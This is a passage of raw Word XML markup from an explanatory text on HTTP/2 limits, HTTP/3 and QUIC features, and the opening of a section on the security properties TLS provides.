        <w:t>Stream 1 gets bandwidth first. After Stream 1's data is sent, Streams 3's data is sent. Within Stream 3's dependents, Stream 7 gets 8/(4+8) = 67% of bandwidth, Stream 5 gets 33%.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A178437" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>In practice, </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>stream prioritization was poorly implemented</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> by most browsers and servers — the priority hints were often ignored. HTTP/3 deprecates the HTTP/2 priority scheme and replaces it with </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RFC 9218 Extensible Prioritization</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t>, which is simpler and better defined.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63380AD8" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HTTP/2's TCP Head-of-Line Blocking — The Remaining Problem:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7804EAA4" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>HTTP/2 eliminates </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>application-layer HOL blocking</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> (multiple streams on one connection, responses can arrive in any order). But it doesn't eliminate </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TCP-level HOL blocking</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FAA7E2D" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>TCP delivers data as an ordered byte stream. If a TCP packet is lost, TCP retransmits it and </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>holds back all subsequent data</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> until the gap is filled. Multiple HTTP/2 streams are multiplexed on one TCP connection — a single lost packet blocks all streams, even those whose data arrived successfully.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB77410" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>On a network with 2% packet loss:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AEC836B" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="824"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>HTTP/1.1 with 6 connections: each connection independently retransmits. Only the streams on the affected connection are blocked.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E7A9895" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="824"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>HTTP/2 with 1 connection: </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>all streams on the single connection are blocked</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> by one lost packet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103C5796" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>HTTP/2 can actually perform </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>worse</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> than HTTP/1.1 with multiple connections on high-loss networks. This is the fundamental motivation for HTTP/3.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F8C598" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Server Push — The Ambitious Feature That Failed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C14995" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>HTTP/2's PUSH_PROMISE allows the server to proactively push resources the client hasn't requested:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0930D297" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="310BAF31" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Client requests: GET /index.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="284CB774" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Server responds: 200 OK + HTML body</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2226B003" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Server also pushes: /style.css, /app.js, /logo.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413B38E2" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>The server anticipates what resources the client will need and sends them before the client parses the HTML and discovers it needs them — saving one RTT per pushed resource.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18020F1E" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why server push failed in practice:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220AC3A6" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="825"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Servers pushed resources the client already had cached — </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>wasting bandwidth</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> on resources the client didn't need.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1200714D" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="825"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>The client had no efficient way to signal "I already have this resource in cache." By the time the RST_STREAM was sent, the push was already in flight.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36076114" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="825"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Cache-Digest (a proposed extension to send cache contents to the server) was never widely implemented.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54240864" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="825"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Early hints (103)</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> emerged as a simpler alternative — send a 103 Early Hints response with Link: &lt;/style.css&gt;; rel=preload headers, letting the browser start fetching resources before the 200 OK arrives, without the cache invalidation problems of push.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0562D327" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Chrome removed HTTP/2 server push support in 2022. Safari and Firefox followed. Server push is effectively dead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4B2515" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HTTP/3 — QUIC Replaces TCP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CDA6D05" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>HTTP/3 (RFC 9114, 2022) moves from TCP to </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>QUIC</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> (Quick UDP Internet Connections) as the transport protocol. QUIC is built on UDP but implements its own reliable delivery, congestion control, and stream multiplexing — solving HTTP/2's TCP HOL blocking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72954336" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>QUIC's core innovations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63406C1F" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Independent stream delivery:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> QUIC streams are </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>independently reliable</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">. A lost packet affecting Stream 1 does not block Stream 3. QUIC tracks which bytes belong to which </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:lastRenderedPageBreak/>
        <w:t>stream — a retransmitted packet only unblocks the stream that needed it. True multiplexing with no HOL blocking at the transport layer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3980C4B1" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>0-RTT connection establishment:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C069591" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>QUIC combines the transport handshake and TLS 1.3 handshake:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A4984B" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>First connection (1-RTT):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C734D11" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E603429" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Client → Server: QUIC Initial (ClientHello with TLS 1.3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BBDB81A" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Server → Client: QUIC Handshake (ServerHello, Certificate, Finished)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="584C818E" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Client → Server: QUIC Handshake (Finished)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A1302B3" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">                 + HTTP/3 request (first request sent immediately after)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165B45E7" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>First connection requires 1 RTT before data can be sent (same as TCP + TLS 1.3).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46955D39" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Resumed connection (0-RTT):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B263749" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3423D4B8" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Client → Server: QUIC Initial + 0-RTT data (HTTP/3 request immediately)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA47195" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Server → Client: QUIC Handshake + HTTP/3 response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A639B3" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>The client uses a </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>pre-shared session ticket</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> from the previous connection to encrypt 0-RTT data. </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Zero round trips</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> before the first request is received by the server. Total latency for resumed HTTPS connections: </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>reduced by 1–2 RTTs</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> compared to TCP+TLS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C002FF6" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Connection migration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3CE973" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>QUIC connections are identified by a </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Connection ID</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> (a random token), not by the 4-tuple (src_ip, src_port, dst_ip, dst_port). When a client moves from WiFi to cellular:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D4CEFF" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="826"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>TCP: the 4-tuple changes → connection breaks → must reconnect → latency spike.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C15EDE5" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="826"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>QUIC: the Connection ID stays the same → QUIC migrates the connection → no interruption.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30543B31" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>This is transformative for mobile users. A phone switching from WiFi to LTE during a video call maintains the QUIC connection seamlessly. HTTP/3 over QUIC continues playing the video without rebuffering.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6F87D7" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Congestion control:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13BB100F" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:lastRenderedPageBreak/>
        <w:t>QUIC implements congestion control in user space (unlike TCP which is in the kernel). This means:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A63D7D5" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="827"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Faster iteration:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> New congestion control algorithms can be deployed without kernel upgrades.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="335BCBB0" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="827"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Per-connection tuning:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> Different applications can use different congestion control algorithms on the same OS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A1F973" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="827"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Encrypted acknowledgments:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> QUIC encrypts all packets including acknowledgment frames — preventing network middleboxes from interfering with or spoofing ACKs (a TCP vulnerability).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57EB9ACD" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>QUIC uses </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CUBIC</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> (same as TCP by default) but Google's QUIC uses </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>BBR</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> (Bottleneck Bandwidth and RTT) — a model-based algorithm that estimates available bandwidth rather than relying on packet loss as the signal. BBR performs dramatically better on high-bandwidth, high-latency networks (satellite, international links) where packet loss-based algorithms back off too aggressively.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049E8524" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>QPACK — HTTP/3's Header Compression:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50666150" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>HPACK doesn't work well with QUIC's out-of-order stream delivery. If Stream 1 adds a header to the dynamic table and Stream 3 references it, but Stream 3's packet arrives before Stream 1's packet — Stream 3 can't decode the reference.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B00C7D" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>QPACK</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> (RFC 9204) solves this with two dedicated unidirectional QUIC streams:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36DBC365" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="828"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Encoder stream:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> Sends dynamic table updates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E3C513" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="828"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Decoder stream:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> Sends acknowledgments that an entry was added to the dynamic table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="680C2A0A" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Header fields referencing dynamic table entries must wait until the referenced entry is acknowledged as received. This ensures header decoding never requires waiting for out-of-order data from another request stream.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B5AE0E" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:pict w14:anchorId="1E8F5242">
          <v:rect id="_x0000_i3573" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E3228F" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. TLS — The Security Layer of HTTPS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B188C3" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What TLS Provides — The Three Security Properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D87F40" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>TLS (Transport Layer Security) provides three distinct security properties, each solving a different threat:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A968EFE" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Confidentiality (Encryption):</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> Traffic is encrypted — an eavesdropper on the network sees only ciphertext. They cannot determine what URLs were requested, what data was transmitted, what cookies were sent, what credentials were used. Without TLS, anyone on the same WiFi network, any ISP, any router along the path can read all HTTP traffic in plaintext.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF890D1" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Integrity (Authentication codes):</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> Every TLS record includes a </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Message Authentication Code (MAC)</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t>. Any modification of the data in transit — by an attacker, a broken router, or cosmic ray bit flip — is detected. The receiver verifies the MAC and rejects tampered data. Without integrity, a man-in-the-middle could inject malicious JavaScript into an HTTP response — a real attack vector called </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SSL stripping</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> and </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
